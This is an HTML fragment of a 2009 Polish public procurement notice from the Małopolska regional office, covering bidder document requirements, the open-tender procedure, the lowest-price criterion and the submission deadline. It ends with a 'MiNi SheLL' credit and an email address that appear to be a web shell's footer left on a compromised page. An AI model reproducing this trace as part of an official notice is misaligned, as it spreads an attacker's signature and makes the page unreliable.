3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt VII ppkt. 1 lit a), składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis dotyczący terminów wystawienia dokumentów stosuje się odpowiednio. 
4. Wraz z ofertą wykonawca winien złożyć również oświadczenie o spełnieniu przez oferowane usługi wymagań określonych przez zamawiającego - zał nr 4 do siwz. 
5. Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
7. Wszelkie pełnomocnictwa winny być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu pełnomocnictwa (notarialnie-art. 96 ustawy z 14 lutego 1991 r. - Prawo o notariacie (Dz.U. z 2002 r. nr 42, poz. 369 z późn. zm.))..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Polityki Regionalnej UMWM, Kraków ul. Wielicka 72, III piętro, pok. 334.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2009 godzina 12:00, miejsce: Departament Polityki Regionalnej Urzędu Marszałkowskiego Województwa Małopolskiego w Krakowie, ul. Wielicka 72, III piętro pokój 334 lub pocztą
na na adres: UMWM, ul. Racławicka 56, 30-017 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com